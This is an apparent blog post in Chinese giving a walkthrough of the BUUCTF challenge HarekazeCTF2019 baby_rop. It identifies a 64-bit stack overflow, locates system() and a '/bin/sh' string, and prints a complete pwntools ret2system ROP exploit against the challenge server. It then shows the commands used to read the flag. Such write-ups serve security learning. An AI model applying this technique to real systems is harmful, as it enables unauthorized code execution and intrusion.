0
点赞
收藏
分享

微信扫一扫

buuctf|[HarekazeCTF2019]baby_rop 1

嚯霍嚯 2022-05-02 阅读 55
安全

buuctf|[HarekazeCTF2019]baby_rop 1

分析

下载文件重命名为pwn_15,checksec一下
在这里插入图片描述
只开启了NX,64位,用ida看看
在这里插入图片描述
这里可以栈溢出,同时在侧面看到了system()

shift+F12查看字符串在这里插入图片描述

在这里插入图片描述
找到binsh,由于是64位,我们要寄存器传参,ROPgadget下
在这里插入图片描述

exp如下

from pwn import*

p=remote('node4.buuoj.cn',25977)
#p=process("./pwn_15")

system_addr=0x400490
binsh_addr=0x601048
ret_addr=0x400479
popdi_addr=0x400683

payload=b'A'*0x18+p64(ret_addr)+p64(popdi_addr)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)

p.interactive()

flag

拿到控制权后

find -name flag

找到地址后cat,得flag
在这里插入图片描述

举报

相关推荐

0 条评论